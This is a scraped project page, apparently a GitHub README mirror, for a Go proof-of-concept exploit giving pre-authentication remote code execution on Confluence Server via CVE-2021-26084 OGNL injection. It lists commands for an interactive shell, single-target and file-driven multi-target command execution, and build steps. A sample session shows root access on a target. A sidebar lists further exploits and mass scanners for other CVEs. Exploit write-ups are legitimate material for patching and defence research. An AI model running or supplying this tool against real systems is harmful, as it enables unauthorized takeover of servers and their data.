CVE-2021-26084 - Confluence Server Webwork OGNL injection (Pre-Auth RCE)

Tay

Last update: Nov 9, 2022

Comments: 1

CVE-2021-26084

Proof of concept for CVE-2021-26084.

Confluence Server Webwork OGNL injection (Pre-Auth RCE)

Disclaimer

This is for educational purposes only. I am not responsible for your actions. Use at your own discretion.

Command Limiations

Due to the payload, it is not possible to pass some characters. The list below is what I've found during my testing.

Double quotations "
Vertical bar |

Interactive Shell

 go run exploit.go -t <target> -i

Example

root@localhost:/# go run exploit.go -t http://localhost:8090 -i
CVE-2021-26084 - Confluence Server Webwork OGNL injection
Made by Tay (https://github.com/taythebot)
time="2021-09-02T00:29:37+09:00" level=info msg="Checking if https://localhost:8090 is vulnerable"
time="2021-09-02T00:29:39+09:00" level=info msg="Target https://localhost:8090 is vulnerable"
root@confluence:/# whoami
root
root@confluence:/# exit
Exiting interactive mode, goodbye

Only works on a single target
Type exit to exit the interactive shell
Notice shows if possible Windows machine

Single Target

go run exploit.go -t <target> -c <command>

Multiple Targets

go run exploit.go -f <file> -c <command>

Build

go mod download
go build exploit.go

Owner

Tay

Fullstack developer focusing on Go and Javascript. I sometimes write PHP in shame...

https://github.com/taythebot/CVE-2021-26084

Similar Resources

A fast tool to mass scan for a vulnerability on Microsoft Exchange Server that allows an attacker bypassing the authentication and impersonating as the admin (CVE-2021-26855).

proxylogscan This tool to mass scan for a vulnerability on Microsoft Exchange Server that allows an attacker bypassing the authentication and imperson

Dec 26, 2022

A small server for verifing if a given java program is succeptibel to CVE-2021-44228

CVE-2021-44228-Test-Server A small server for verifing if a given java program is succeptibel to CVE-2021-44228 Usage Build the program using go build

Nov 9, 2022

CVE-2021-21978 exp

CVE-2021-21978 CVE-2021-21978 RCE exp 影响版本 VMware View Planner Harness 4.X 与 CVE-2021-21978 类似，该漏洞可以在未授权访问的情况下，上传任意文件，并通过修改自带 py 脚本实现远程代码执行。

Nov 9, 2022

CVE-2021-26855 exp

CVE-2021-26855 CVE-2021-26855 ssrf 简单利用 golang 练习影响版本 Exchange Server 2013 小于 CU23 Exchange Server 2016 小于 CU18 Exchange Server 2019 小于 CU7 利用条件该漏洞不

Sep 12, 2022

CVE-2021-26855 exp

CVE-2021-26855 CVE-2021-26855 ssrf 简单利用 golang 练习影响版本 Exchange Server 2013 小于 CU23 Exchange Server 2016 小于 CU18 Exchange Server 2019 小于 CU7 利用条件该漏洞不

Sep 12, 2022

Exploit for HiveNightmare - CVE-2021–36934

HiveNightmare this is a quick and dirty exploit for HiveNightmare (or SeriousSam) - CVE-2021–36934 This allows non administrator users to read the SAM

Dec 3, 2022

CVE-2021-3449 OpenSSL denial-of-service exploit 👨🏻‍💻

CVE-2021-3449 OpenSSL 1.1.1k DoS exploit Usage: go run . -host hostname:port This program implements a proof-of-concept exploit of CVE-2021-3449 affe

Dec 16, 2022

CVE 2021 41277

CVE-2021-41277 Usage 1. show help info ~/CVE-2021-41277 ❯ go run main.go -h Usage of main: -f string File containing li

Nov 9, 2022

PoC for CVE-2021-41277

CVE-2021-41277 PoC Metabase is an open source data analytics platform. Local File Inclusion issue has been discovered in some versions of metabase. He

Dec 3, 2021

Comments

Error ./exploit.go:154:15: undefined: io.ReadAll

Hi I am getting error when trying to execute: command-line-arguments ./exploit.go:154:15: undefined: io.ReadAll

Any idea what is happening? Tried on 2 different machines with 2 different versions of go installed.

CVE-2021-26084 - Confluence Server Webwork OGNL injection (Pre-Auth RCE)

CVE-2021-26084

Disclaimer

Command Limiations

Interactive Shell

Single Target

Multiple Targets

Build

Owner

Tay

Similar Resources

A fast tool to mass scan for a vulnerability on Microsoft Exchange Server that allows an attacker bypassing the authentication and impersonating as the admin (CVE-2021-26855).

A small server for verifing if a given java program is succeptibel to CVE-2021-44228

CVE-2021-21978 exp

CVE-2021-26855 exp

CVE-2021-26855 exp

Exploit for HiveNightmare - CVE-2021–36934

CVE-2021-3449 OpenSSL denial-of-service exploit 👨🏻‍💻

CVE 2021 41277

PoC for CVE-2021-41277

Comments

Error ./exploit.go:154:15: undefined: io.ReadAll

Related tags

vRealize RCE + Privesc (CVE-2021-21975, CVE-2021-21983, CVE-0DAY-?????)

CVE-2021-43798 - Grafana 8.x Path Traversal (Pre-Auth)

A FreeSWITCH specific scanning and exploitation toolkit for CVE-2021-37624 and CVE-2021-41157.

Poc-cve-2021-4034 - PoC for CVE-2021-4034 dubbed pwnkit

CVE-2021-4034 - A Golang implementation of clubby789's implementation of CVE-2021-4034

A CVE-2021-22205 Gitlab RCE POC written in Golang

CVE-2021-22205 RCE

Look for JAR files that vulnerable to Log4j RCE (CVE‐2021‐44228)

A minimalistic LDAP server that is meant for test vulnerability to JNDI+LDAP injection attacks in Java, especially CVE-2021-44228.

Proof-of-Concept tool for CVE-2021-29156, an LDAP injection vulnerability in ForgeRock OpenAM v13.0.0.